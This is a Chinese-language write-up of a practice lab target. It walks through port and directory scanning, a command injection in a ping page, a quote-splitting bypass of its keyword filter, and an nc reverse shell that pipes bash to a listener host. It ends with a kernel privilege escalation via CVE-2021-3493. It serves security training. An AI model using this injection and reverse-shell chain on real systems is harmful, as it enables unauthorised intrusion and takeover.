靶场练习(8):HacLabs

靶机ip:172.16.33.49

突破

端口扫描

sudo nmap -p- 172.16.33.49 --open

结果如下:

在这里插入图片描述

特定端口扫描

sudo nmap -p80 -sV -A 172.16.33.49

结果如下:

在这里插入图片描述

针对80端口

隐藏路径枚举:

dirsearch -u http://172.16.33.49

结果如下:

在这里插入图片描述

隐藏文件枚举:

dirsearch -u http://172.16.33.49 -f -e txt,php,html.pdf

结果如下:

在这里插入图片描述

进入http://172.16.33.49/superadmin.php,根据提示怀疑其有ping功能,输入127.0.0.1尝试,发现果然如此:

在这里插入图片描述
既然有ping功能,那么就可以怀疑其有命令注入漏洞,尝试输入指令进行测试并查看源码:

1 |cat superadmin.php

在这里插入图片描述

根据其中的php脚本,可知该页面进行了关键字屏蔽,考虑通过单引号来对该屏蔽进行绕过操作:

输入指令:

1|which n’'c

得到结果:

在这里插入图片描述

绕过成功,这个时候就可以考虑用nc进行反弹bash操作了,本地端做好监听,输入以下指令:

1|n’‘c 10.8.0.19 1234 | bash | n’'c 10.8.0.19 2345

在这里插入图片描述

反弹成功,突破完成。

提权

升级终端

python3 -c 'import pty;pty.spawn("/bin/bash")'

查看版本号和内核号

uname -a
cat /etc/os*

如图所示,知道是18.04ubuntu+5.0.0内核:

在这里插入图片描述

使用CVE-2021-3493内核漏洞进行提权

通过python传输和wget将编译好的文件上传至目标机/tmp目录下,执行:

在这里插入图片描述

提权成功,打靶完成。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值